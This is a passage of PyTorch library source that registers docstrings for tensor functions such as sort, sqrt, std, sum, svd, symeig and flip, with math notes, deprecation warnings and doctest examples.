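>>> torch.get_num_threads()
4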
""")
add_docstr(torch.set_num_interop_threads, r"""
set_num_interop_threads(int)
Sets the number of threads used for interop parallelism
(e.g. in JIT interpreter) on CPU.
.. warning::
Can only be called once and before any inter-op parallel work
is started (e.g. JIT execution).
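Example (an illustrative sketch; this may only be called once, early in the program)::
>>> torch.set_num_interop_threads(4)
>>> torch.get_num_interop_threads()
4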
""")
add_docstr(torch.sigmoid, r"""
sigmoid(input, *, out=None) -> Tensor
Alias for :func:`torch.special.expit`.
""")
add_docstr(torch.logit,
r"""
logit(input, eps=None, *, out=None) -> Tensor
Alias for :func:`torch.special.logit`.
""")
add_docstr(torch.sign,
r"""
sign(input, *, out=None) -> Tensor
Returns a new tensor with the signs of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \operatorname{sgn}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([0.7, -1.2, 0., 2.3])
>>> a
tensor([ 0.7000, -1.2000, 0.0000, 2.3000])
>>> torch.sign(a)
tensor([ 1., -1., 0., 1.])
""".format(**common_args))
add_docstr(torch.signbit,
r"""
signbit(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` has its sign bit set (is less than zero) or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([0.7, -1.2, 0., 2.3])
>>> torch.signbit(a)
tensor([ False, True, False, False])
""".format(**common_args))
add_docstr(torch.sgn,
r"""
sgn(input, *, out=None) -> Tensor
This function is an extension of :func:`torch.sign` to complex tensors.
For complex tensors, it computes a new tensor whose elements have
the same angles as the corresponding elements of :attr:`input` and
absolute values (i.e. magnitudes) of one.
For non-complex tensors, it is equivalent to :func:`torch.sign`.
.. math::
\text{out}_{i} = \begin{cases}
0 & |\text{input}_i| == 0 \\
\frac{\text{input}_i}{|\text{input}_i|} & \text{otherwise}
\end{cases}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> t = torch.tensor([3+4j, 7-24j, 0, 1+2j])
>>> t.sgn()
tensor([0.6000+0.8000j, 0.2800-0.9600j, 0.0000+0.0000j, 0.4472+0.8944j])
""".format(**common_args))
add_docstr(torch.sin,
r"""
sin(input, *, out=None) -> Tensor
Returns a new tensor with the sine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sin(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.5461, 0.1347, -2.7266, -0.2746])
>>> torch.sin(a)
tensor([-0.5194, 0.1343, -0.4032, -0.2711])
""".format(**common_args))
add_docstr(torch.sinc,
r"""
sinc(input, *, out=None) -> Tensor
Alias for :func:`torch.special.sinc`.
""")
add_docstr(torch.sinh,
r"""
sinh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic sine of the elements of
:attr:`input`.
.. math::
\text{out}_{i} = \sinh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.5380, -0.8632, -0.1265, 0.9399])
>>> torch.sinh(a)
tensor([ 0.5644, -0.9744, -0.1268, 1.0845])
.. note::
When :attr:`input` is on the CPU, the implementation of torch.sinh may use
the Sleef library, which rounds very large results to infinity or negative
infinity. See `here <https://sleef.org/purec.xhtml>`_ for details.
""".format(**common_args))
add_docstr(torch.sort,
r"""
sort(input, dim=-1, descending=False, stable=False, *, out=None) -> (Tensor, LongTensor)
Sorts the elements of the :attr:`input` tensor along a given dimension
in ascending order by value.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`descending` is ``True`` then the elements are sorted in descending
order by value.
If :attr:`stable` is ``True`` then the sorting routine becomes stable, preserving
the order of equivalent elements.
A namedtuple of (values, indices) is returned, where the `values` are the
sorted values and `indices` are the indices of the elements in the original
`input` tensor.
Args:
{input}
dim (int, optional): the dimension to sort along
descending (bool, optional): controls the sorting order (ascending or descending)
stable (bool, optional): makes the sorting routine stable, which guarantees that the order
of equivalent elements is preserved.
Keyword args:
out (tuple, optional): the output tuple of (`Tensor`, `LongTensor`) that can
be optionally given to be used as output buffers
Example::
>>> x = torch.randn(3, 4)
>>> sorted, indices = torch.sort(x)
>>> sorted
tensor([[-0.2162, 0.0608, 0.6719, 2.3332],
[-0.5793, 0.0061, 0.6058, 0.9497],
[-0.5071, 0.3343, 0.9553, 1.0960]])
>>> indices
tensor([[ 1, 0, 2, 3],
[ 3, 1, 0, 2],
[ 0, 3, 1, 2]])
>>> sorted, indices = torch.sort(x, 0)
>>> sorted
tensor([[-0.5071, -0.2162, 0.6719, -0.5793],
[ 0.0608, 0.0061, 0.9497, 0.3343],
[ 0.6058, 0.9553, 1.0960, 2.3332]])
>>> indices
tensor([[ 2, 0, 0, 1],
[ 0, 1, 1, 2],
[ 1, 2, 2, 0]])
>>> x = torch.tensor([0, 1] * 9)
>>> x.sort()
torch.return_types.sort(
values=tensor([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
indices=tensor([ 2, 16, 4, 6, 14, 8, 0, 10, 12, 9, 17, 15, 13, 11, 7, 5, 3, 1]))
>>> x.sort(stable=True)
torch.return_types.sort(
values=tensor([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
indices=tensor([ 0, 2, 4, 6, 8, 10, 12, 14, 16, 1, 3, 5, 7, 9, 11, 13, 15, 17]))
""".format(**common_args))
add_docstr(torch.argsort,
r"""
argsort(input, dim=-1, descending=False) -> LongTensor
Returns the indices that sort a tensor along a given dimension in ascending
order by value.
This is the second value returned by :meth:`torch.sort`. See its documentation
for the exact semantics of this method.
Args:
{input}
dim (int, optional): the dimension to sort along
descending (bool, optional): controls the sorting order (ascending or descending)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.0785, 1.5267, -0.8521, 0.4065],
[ 0.1598, 0.0788, -0.0745, -1.2700],
[ 1.2208, 1.0722, -0.7064, 1.2564],
[ 0.0669, -0.2318, -0.8229, -0.9280]])
>>> torch.argsort(a, dim=1)
tensor([[2, 0, 3, 1],
[3, 2, 1, 0],
[2, 1, 0, 3],
[3, 2, 1, 0]])
""".format(**common_args))
add_docstr(torch.msort,
r"""
msort(input, *, out=None) -> Tensor
Sorts the elements of the :attr:`input` tensor along its first dimension
in ascending order by value.
.. note:: `torch.msort(t)` is equivalent to `torch.sort(t, dim=0)[0]`.
See also :func:`torch.sort`.
Args:
{input}
Keyword args:
{out}
Example::
>>> t = torch.randn(3, 4)
>>> t
tensor([[-0.1321, 0.4370, -1.2631, -1.1289],
[-2.0527, -1.1250, 0.2275, 0.3077],
[-0.0881, -0.1259, -0.5495, 1.0284]])
>>> torch.msort(t)
tensor([[-2.0527, -1.1250, -1.2631, -1.1289],
[-0.1321, -0.1259, -0.5495, 0.3077],
[-0.0881, 0.4370, 0.2275, 1.0284]])
""".format(**common_args))
add_docstr(torch.sparse_csr_tensor,
r"""
sparse_csr_tensor(crow_indices, col_indices, values, size=None, *, dtype=None, device=None, requires_grad=False) -> Tensor
Constructs a :ref:`sparse tensor in CSR (Compressed Sparse Row) <sparse-csr-docs>` with specified
values at the given :attr:`crow_indices` and :attr:`col_indices`. Sparse matrix multiplication operations
in CSR format are typically faster than those for sparse tensors in COO format. Make sure you have a look
at :ref:`the note on the data type of the indices <sparse-csr-docs>`.
Args:
crow_indices (array_like): One-dimensional array of size size[0] + 1. The last element
is the number of non-zero elements. This tensor encodes the starting index in values
and col_indices for each row. The difference between consecutive elements gives the
number of non-zero elements in the corresponding row.
col_indices (array_like): Column coordinates of each element in values. Strictly a
one-dimensional tensor with the same length as values.
values (array_like): Initial values for the tensor. Can be a list, tuple, NumPy ``ndarray``, scalar,
and other types.
size (list, tuple, :class:`torch.Size`, optional): Size of the sparse tensor. If not provided, the
size will be inferred as the minimum size big enough to hold all non-zero elements.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if None, infers data type from :attr:`values`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if None, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
{requires_grad}
Example ::
>>> crow_indices = [0, 2, 4]
>>> col_indices = [0, 1, 0, 1]
>>> values = [1, 2, 3, 4]
>>> torch.sparse_csr_tensor(torch.tensor(crow_indices, dtype=torch.int64),
... torch.tensor(col_indices, dtype=torch.int64),
... torch.tensor(values), dtype=torch.double)
tensor(crow_indices=tensor([0, 2, 4]),
col_indices=tensor([0, 1, 0, 1]),
values=tensor([1., 2., 3., 4.]), size=(2, 2), nnz=4,
dtype=torch.float64, layout=torch.sparse_csr)
""".format(**factory_common_args))
add_docstr(torch.sparse_coo_tensor,
r"""
sparse_coo_tensor(indices, values, size=None, *, dtype=None, device=None, requires_grad=False) -> Tensor
Constructs a :ref:`sparse tensor in COO(rdinate) format
<sparse-coo-docs>` with specified values at the given
:attr:`indices`.
.. note::
This function returns an :ref:`uncoalesced tensor <sparse-uncoalesced-coo-docs>`.
Args:
indices (array_like): Initial data for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types. Will be cast to a :class:`torch.LongTensor`
internally. The indices are the coordinates of the non-zero values in the matrix, and thus
should be two-dimensional where the first dimension is the number of tensor dimensions and
the second dimension is the number of non-zero values.
values (array_like): Initial values for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types.
size (list, tuple, or :class:`torch.Size`, optional): Size of the sparse tensor. If not
provided the size will be inferred as the minimum size big enough to hold all non-zero
elements.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if None, infers data type from :attr:`values`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if None, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
{requires_grad}
Example::
>>> i = torch.tensor([[0, 1, 1],
... [2, 0, 2]])
>>> v = torch.tensor([3, 4, 5], dtype=torch.float32)
>>> torch.sparse_coo_tensor(i, v, [2, 4])
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
size=(2, 4), nnz=3, layout=torch.sparse_coo)
>>> torch.sparse_coo_tensor(i, v) # Shape inference
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
size=(2, 3), nnz=3, layout=torch.sparse_coo)
>>> torch.sparse_coo_tensor(i, v, [2, 4],
... dtype=torch.float64,
... device=torch.device('cuda:0'))
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
device='cuda:0', size=(2, 4), nnz=3, dtype=torch.float64,
layout=torch.sparse_coo)
# Create an empty sparse tensor with the following invariants:
# 1. sparse_dim + dense_dim = len(SparseTensor.shape)
# 2. SparseTensor._indices().shape = (sparse_dim, nnz)
# 3. SparseTensor._values().shape = (nnz, SparseTensor.shape[sparse_dim:])
#
# For instance, to create an empty sparse tensor with nnz = 0, dense_dim = 0 and
# sparse_dim = 1 (hence indices is a 2D tensor of shape = (1, 0))
>>> S = torch.sparse_coo_tensor(torch.empty([1, 0]), [], [1])
tensor(indices=tensor([], size=(1, 0)),
values=tensor([], size=(0,)),
size=(1,), nnz=0, layout=torch.sparse_coo)
# and to create an empty sparse tensor with nnz = 0, dense_dim = 1 and
# sparse_dim = 1
>>> S = torch.sparse_coo_tensor(torch.empty([1, 0]), torch.empty([0, 2]), [1, 2])
tensor(indices=tensor([], size=(1, 0)),
values=tensor([], size=(0, 2)),
size=(1, 2), nnz=0, layout=torch.sparse_coo)
.. _torch.sparse: https://pytorch.org/docs/stable/sparse.html
""".format(**factory_common_args))
add_docstr(torch.sqrt,
r"""
sqrt(input, *, out=None) -> Tensor
Returns a new tensor with the square-root of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sqrt{\text{input}_{i}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-2.0755, 1.0226, 0.0831, 0.4806])
>>> torch.sqrt(a)
tensor([ nan, 1.0112, 0.2883, 0.6933])
""".format(**common_args))
add_docstr(torch.square,
r"""
square(input, *, out=None) -> Tensor
Returns a new tensor with the square of the elements of :attr:`input`.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-2.0755, 1.0226, 0.0831, 0.4806])
>>> torch.square(a)
tensor([ 4.3077, 1.0457, 0.0069, 0.2310])
""".format(**common_args))
add_docstr(torch.squeeze,
r"""
squeeze(input, dim=None, *, out=None) -> Tensor
Returns a tensor with all the dimensions of :attr:`input` of size `1` removed.
For example, if `input` is of shape:
:math:`(A \times 1 \times B \times C \times 1 \times D)` then the `out` tensor
will be of shape: :math:`(A \times B \times C \times D)`.
When :attr:`dim` is given, a squeeze operation is done only in the given
dimension. If `input` is of shape: :math:`(A \times 1 \times B)`,
``squeeze(input, 0)`` leaves the tensor unchanged, but ``squeeze(input, 1)``
will squeeze the tensor to the shape :math:`(A \times B)`.
.. note:: The returned tensor shares the storage with the input tensor,
so changing the contents of one will change the contents of the other.
.. warning:: If the tensor has a batch dimension of size 1, then `squeeze(input)`
will also remove the batch dimension, which can lead to unexpected
errors.
Args:
{input}
dim (int, optional): if given, the input will be squeezed only in
this dimension
Keyword args:
{out}
Example::
>>> x = torch.zeros(2, 1, 2, 1, 2)
>>> x.size()
torch.Size([2, 1, 2, 1, 2])
>>> y = torch.squeeze(x)
>>> y.size()
torch.Size([2, 2, 2])
>>> y = torch.squeeze(x, 0)
>>> y.size()
torch.Size([2, 1, 2, 1, 2])
>>> y = torch.squeeze(x, 1)
>>> y.size()
torch.Size([2, 2, 1, 2])
""".format(**common_args))
add_docstr(torch.std, r"""
std(input, dim, unbiased, keepdim=False, *, out=None) -> Tensor
Calculates the standard deviation of each row of the :attr:`input` tensor in
the given dimension :attr:`dim`.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
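Example (an illustrative sketch of the per-dimension reduction)::
>>> a = torch.tensor([[1., 2.], [3., 4.]])
>>> torch.std(a, dim=1, unbiased=True)
tensor([0.7071, 0.7071])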
.. function:: std(input, unbiased) -> Tensor
:noindex:
Calculates the standard deviation of all elements in the :attr:`input` tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.std(a, unbiased=False)
tensor(0.4188)
""".format(**multi_dim_common))
add_docstr(torch.std_mean,
r"""
std_mean(input, dim, unbiased, keepdim=False, *, out=None) -> (Tensor, Tensor)
Calculates the standard deviation and mean of each row of the :attr:`input`
tensor in the given dimension :attr:`dim`.
If :attr:`unbiased` is ``True``, Bessel's correction will be used to calculate
the standard deviation. Otherwise, the sample deviation is calculated, without
any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
Returns:
A tuple (std, mean) containing the standard deviation and mean.
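Example (an illustrative sketch of the per-dimension reduction)::
>>> a = torch.tensor([[1., 2.], [3., 4.]])
>>> torch.std_mean(a, dim=1, unbiased=True)
(tensor([0.7071, 0.7071]), tensor([1.5000, 3.5000]))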
.. function:: std_mean(input, unbiased) -> (Tensor, Tensor)
:noindex:
Calculates the standard deviation and mean of all elements in the :attr:`input`
tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Returns:
A tuple (std, mean) containing the standard deviation and mean.
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.std_mean(a, unbiased=False)
(tensor(0.4188), tensor(-0.8509))
""".format(**multi_dim_common))
add_docstr(torch.sub, r"""
sub(input, other, *, alpha=1, out=None) -> Tensor
Subtracts :attr:`other`, scaled by :attr:`alpha`, from :attr:`input`.
.. math::
\text{out}_i = \text{input}_i - \text{alpha} \times \text{other}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number): the tensor or number to subtract from :attr:`input`.
Keyword args:
alpha (Number): the multiplier for :attr:`other`.
{out}
Example::
>>> a = torch.tensor((1, 2))
>>> b = torch.tensor((0, 1))
>>> torch.sub(a, b, alpha=2)
tensor([1, 0])
""".format(**common_args))
add_docstr(torch.subtract, r"""
subtract(input, other, *, alpha=1, out=None) -> Tensor
Alias for :func:`torch.sub`.
""")
add_docstr(torch.sum,
r"""
sum(input, *, dtype=None) -> Tensor
Returns the sum of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.1133, -0.9567, 0.2958]])
>>> torch.sum(a)
tensor(-0.5475)
.. function:: sum(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the sum of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`. If :attr:`dim` is a list of dimensions,
reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.0569, -0.2475, 0.0737, -0.3429],
[-0.2993, 0.9138, 0.9337, -1.6864],
[ 0.1132, 0.7892, -0.1003, 0.5688],
[ 0.3637, -0.9906, -0.4752, -1.5197]])
>>> torch.sum(a, 1)
tensor([-0.4598, -0.1381, 1.3708, -2.6217])
>>> b = torch.arange(4 * 5 * 6).view(4, 5, 6)
>>> torch.sum(b, (2, 1))
tensor([ 435., 1335., 2235., 3135.])
""".format(**multi_dim_common))
add_docstr(torch.nansum,
r"""
nansum(input, *, dtype=None) -> Tensor
Returns the sum of all elements, treating Not a Numbers (NaNs) as zero.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.tensor([1., 2., float('nan'), 4.])
>>> torch.nansum(a)
tensor(7.)
.. function:: nansum(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the sum of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`, treating Not a Numbers (NaNs) as zero.
If :attr:`dim` is a list of dimensions, reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> torch.nansum(torch.tensor([1., float("nan")]))
1.0
>>> a = torch.tensor([[1, 2], [3., float("nan")]])
>>> torch.nansum(a)
tensor(6.)
>>> torch.nansum(a, dim=0)
tensor([4., 2.])
>>> torch.nansum(a, dim=1)
tensor([3., 3.])
""".format(**multi_dim_common))
add_docstr(torch.svd,
r"""
svd(input, some=True, compute_uv=True, *, out=None) -> (Tensor, Tensor, Tensor)
Computes the singular value decomposition of either a matrix or batch of
matrices :attr:`input`. The singular value decomposition is represented as a
namedtuple `(U, S, V)`, such that :attr:`input` :math:`= U \text{diag}(S) V^{\text{H}}`,
where :math:`V^{\text{H}}` is the transpose of `V` for real inputs,
and the conjugate transpose of `V` for complex inputs.
If :attr:`input` is a batch of matrices, then `U`, `S`, and `V` are also
batched with the same batch dimensions as :attr:`input`.
If :attr:`some` is `True` (default), the method returns the reduced singular
value decomposition. In this case, if the last two dimensions of :attr:`input` are
`m` and `n`, then the returned `U` and `V` matrices will contain only
`min(n, m)` orthonormal columns.
If :attr:`compute_uv` is `False`, the returned `U` and `V` will be
zero-filled matrices of shape `(m, m)` and `(n, n)`
respectively, on the same device as :attr:`input`. The argument :attr:`some`
has no effect when :attr:`compute_uv` is `False`.
Supports :attr:`input` of float, double, cfloat and cdouble data types.
The dtypes of `U` and `V` are the same as :attr:`input`'s. `S` will
always be real-valued, even if :attr:`input` is complex.
.. warning::
:func:`torch.svd` is deprecated in favor of :func:`torch.linalg.svd`
and will be removed in a future PyTorch release.
``U, S, V = torch.svd(A, some=some, compute_uv=True)`` (default) should be replaced with
.. code:: python
U, S, Vh = torch.linalg.svd(A, full_matrices=not some)
V = Vh.mH
``_, S, _ = torch.svd(A, some=some, compute_uv=False)`` should be replaced with
.. code:: python
S = torch.linalg.svdvals(A)
.. note:: Differences with :func:`torch.linalg.svd`:
* :attr:`some` is the opposite of
:func:`torch.linalg.svd`'s :attr:`full_matrices`. Note that
default value for both is `True`, so the default behavior is
effectively the opposite.
* :func:`torch.svd` returns `V`, whereas :func:`torch.linalg.svd` returns
`Vh`, that is, :math:`V^{\text{H}}`.
* If :attr:`compute_uv` is `False`, :func:`torch.svd` returns zero-filled
tensors for `U` and `Vh`, whereas :func:`torch.linalg.svd` returns
empty tensors.
.. note:: The singular values are returned in descending order. If :attr:`input` is a batch of matrices,
then the singular values of each matrix in the batch are returned in descending order.
.. note:: The `S` tensor can only be used to compute gradients if :attr:`compute_uv` is `True`.
.. note:: When :attr:`some` is `False`, the gradients on `U[..., :, min(m, n):]`
and `V[..., :, min(m, n):]` will be ignored in the backward pass, as those vectors
can be arbitrary bases of the corresponding subspaces.
.. note:: The implementation of :func:`torch.linalg.svd` on CPU uses LAPACK's routine `?gesdd`
(a divide-and-conquer algorithm) instead of `?gesvd` for speed. Analogously,
on GPU, it uses cuSOLVER's routines `gesvdj` and `gesvdjBatched` on CUDA 10.1.243
and later, and MAGMA's routine `gesdd` on earlier versions of CUDA.
.. note:: The returned `U` will not be contiguous. The matrix (or batch of matrices) will
be represented as a column-major matrix (i.e. Fortran-contiguous).
.. warning:: The gradients with respect to `U` and `V` will only be finite when the input does not
have zero nor repeated singular values.
.. warning:: If the distance between any two singular values is close to zero, the gradients with respect to
`U` and `V` will be numerically unstable, as they depend on
:math:`\frac{1}{\min_{i \neq j} \sigma_i^2 - \sigma_j^2}`. The same happens when the matrix
has small singular values, as these gradients also depend on `S⁻¹`.
.. warning:: For complex-valued :attr:`input` the singular value decomposition is not unique,
as `U` and `V` may be multiplied by an arbitrary phase factor :math:`e^{i \phi}` on every column.
The same happens when :attr:`input` has repeated singular values, where one may multiply
the columns of the spanning subspace in `U` and `V` by a rotation matrix
and `the resulting vectors will span the same subspace`_.
Different platforms, like NumPy, or inputs on different device types,
may produce different `U` and `V` tensors.
Args:
input (Tensor): the input tensor of size `(*, m, n)` where `*` is zero or more
batch dimensions consisting of `(m, n)` matrices.
some (bool, optional): controls whether to compute the reduced or full decomposition, and
consequently, the shape of returned `U` and `V`. Default: `True`.
compute_uv (bool, optional): controls whether to compute `U` and `V`. Default: `True`.
Keyword args:
out (tuple, optional): the output tuple of tensors
Example::
>>> a = torch.randn(5, 3)
>>> a
tensor([[ 0.2364, -0.7752, 0.6372],
[ 1.7201, 0.7394, -0.0504],
[-0.3371, -1.0584, 0.5296],
[ 0.3550, -0.4022, 1.5569],
[ 0.2445, -0.0158, 1.1414]])
>>> u, s, v = torch.svd(a)
>>> u
tensor([[ 0.4027, 0.0287, 0.5434],
[-0.1946, 0.8833, 0.3679],
[ 0.4296, -0.2890, 0.5261],
[ 0.6604, 0.2717, -0.2618],
[ 0.4234, 0.2481, -0.4733]])
>>> s
tensor([2.3289, 2.0315, 0.7806])
>>> v
tensor([[-0.0199, 0.8766, 0.4809],
[-0.5080, 0.4054, -0.7600],
[ 0.8611, 0.2594, -0.4373]])
>>> torch.dist(a, torch.mm(torch.mm(u, torch.diag(s)), v.t()))
tensor(8.6531e-07)
>>> a_big = torch.randn(7, 5, 3)
>>> u, s, v = torch.svd(a_big)
>>> torch.dist(a_big, torch.matmul(torch.matmul(u, torch.diag_embed(s)), v.mT))
tensor(2.6503e-06)
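>>> # sanity check on the first (non-batched) example: the reduced U has orthonormal columns
>>> u, s, v = torch.svd(a)
>>> torch.allclose(u.t() @ u, torch.eye(3), atol=1e-5)
True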
.. _the resulting vectors will span the same subspace:
https://en.wikipedia.org/wiki/Singular_value_decomposition#Singular_values,_singular_vectors,_and_their_relation_to_the_SVD
""")
add_docstr(torch.symeig, r"""
symeig(input, eigenvectors=False, upper=True, *, out=None) -> (Tensor, Tensor)
This function returns eigenvalues and eigenvectors
of a real symmetric or complex Hermitian matrix :attr:`input` or a batch thereof,
represented by a namedtuple (eigenvalues, eigenvectors).
This function calculates all eigenvalues (and vectors) of :attr:`input`
such that :math:`\text{input} = V \text{diag}(e) V^T`.
The boolean argument :attr:`eigenvectors` defines computation of
both eigenvectors and eigenvalues or eigenvalues only.
If it is ``False``, only eigenvalues are computed. If it is ``True``,
both eigenvalues and eigenvectors are computed.
Since the input matrix :attr:`input` is supposed to be symmetric or Hermitian,
only the upper triangular portion is used by default.
If :attr:`upper` is ``False``, then lower triangular portion is used.
.. warning::
:func:`torch.symeig` is deprecated in favor of :func:`torch.linalg.eigh`
and will be removed in a future PyTorch release. The default behavior has changed
from using the upper triangular portion of the matrix by default to using the
lower triangular portion.
``L, _ = torch.symeig(A, upper=upper)`` should be replaced with
.. code :: python
UPLO = "U" if upper else "L"
L = torch.linalg.eigvalsh(A, UPLO=UPLO)
``L, V = torch.symeig(A, eigenvectors=True, upper=upper)`` should be replaced with
.. code :: python
UPLO = "U" if upper else "L"
L, V = torch.linalg.eigh(A, UPLO=UPLO)
.. note:: The eigenvalues are returned in ascending order. If :attr:`input` is a batch of matrices,
then the eigenvalues of each matrix in the batch are returned in ascending order.
.. note:: Irrespective of the original strides, the returned matrix `V` will
be transposed, i.e. with strides `V.contiguous().mT.stride()`.
.. warning:: Extra care needs to be taken when backward through outputs. Such
operation is only stable when all eigenvalues are distinct and becomes
less stable the smaller :math:`\min_{i \neq j} |\lambda_i - \lambda_j|` is.
Args:
input (Tensor): the input tensor of size :math:`(*, n, n)` where `*` is zero or more
batch dimensions consisting of symmetric or Hermitian matrices.
eigenvectors (bool, optional): controls whether eigenvectors have to be computed
upper (bool, optional): controls whether to consider upper-triangular or lower-triangular region
Keyword args:
out (tuple, optional): the output tuple of (Tensor, Tensor)
Returns:
(Tensor, Tensor): A namedtuple (eigenvalues, eigenvectors) containing
- **eigenvalues** (*Tensor*): Shape :math:`(*, m)`. The eigenvalues in ascending order.
- **eigenvectors** (*Tensor*): Shape :math:`(*, m, m)`.
If ``eigenvectors=False``, it's an empty tensor.
Otherwise, this tensor contains the orthonormal eigenvectors of the ``input``.
Examples::
>>> a = torch.randn(5, 5)
>>> a = a + a.t() # To make a symmetric
>>> a
tensor([[-5.7827, 4.4559, -0.2344, -1.7123, -1.8330],
[ 4.4559, 1.4250, -2.8636, -3.2100, -0.1798],
[-0.2344, -2.8636, 1.7112, -5.5785, 7.1988],
[-1.7123, -3.2100, -5.5785, -2.6227, 3.1036],
[-1.8330, -0.1798, 7.1988, 3.1036, -5.1453]])
>>> e, v = torch.symeig(a, eigenvectors=True)
>>> e
tensor([-13.7012, -7.7497, -2.3163, 5.2477, 8.1050])
>>> v
tensor([[ 0.1643, 0.9034, -0.0291, 0.3508, 0.1817],
[-0.2417, -0.3071, -0.5081, 0.6534, 0.4026],
[-0.5176, 0.1223, -0.0220, 0.3295, -0.7798],
[-0.4850, 0.2695, -0.5773, -0.5840, 0.1337],
[ 0.6415, -0.0447, -0.6381, -0.0193, -0.4230]])
>>> a_big = torch.randn(5, 2, 2)
>>> a_big = a_big + a_big.mT # To make a_big symmetric
>>> e, v = a_big.symeig(eigenvectors=True)
>>> torch.allclose(torch.matmul(v, torch.matmul(e.diag_embed(), v.mT)), a_big)
True
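>>> # the deprecated call above agrees with torch.linalg.eigvalsh on the same symmetric input
>>> torch.allclose(e, torch.linalg.eigvalsh(a_big), atol=1e-5)
True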
""")
add_docstr(torch.t,
r"""
t(input) -> Tensor
Expects :attr:`input` to be <= 2-D tensor and transposes dimensions 0
and 1.
0-D and 1-D tensors are returned as is. When input is a 2-D tensor this
is equivalent to ``transpose(input, 0, 1)``.
Args:
{input}
Example::
>>> x = torch.randn(())
>>> x
tensor(0.1995)
>>> torch.t(x)
tensor(0.1995)
>>> x = torch.randn(3)
>>> x
tensor([ 2.4320, -0.4608, 0.7702])
>>> torch.t(x)
tensor([ 2.4320, -0.4608, 0.7702])
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 0.4875, 0.9158, -0.5872],
[ 0.3938, -0.6929, 0.6932]])
>>> torch.t(x)
tensor([[ 0.4875, 0.3938],
[ 0.9158, -0.6929],
[-0.5872, 0.6932]])
See also :func:`torch.transpose`.
""".format(**common_args))
add_docstr(torch.flip,
r"""
flip(input, dims) -> Tensor
Reverse the order of an n-D tensor along the given axes in dims.
.. note::
`torch.flip` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.flip`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.flip` is expected to be slower than `np.flip`.
Args:
{input}
dims (a list or tuple): axis to flip on
Example::
>>> x = torch.arange(8).view(2, 2, 2)
>>> x
tensor([[[ 0, 1],
[ 2, 3]],
[[ 4, 5],
[ 6, 7]]])
>>> torch.flip(x, [0, 1])
tensor([[[ 6, 7],
[ 4, 5]],
[[ 2, 3],
[ 0, 1]]])
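>>> # flipping only the last dimension reverses each innermost pair
>>> torch.flip(x, [2])
tensor([[[ 1,  0],
         [ 3,  2]],
        [[ 5,  4],
         [ 7,  6]]])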
""".format(**common_args))
add_docstr(torch.fliplr,
r"""
fliplr(input) -> Tensor
Flip tensor in the left/right direction, returning a new tensor.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
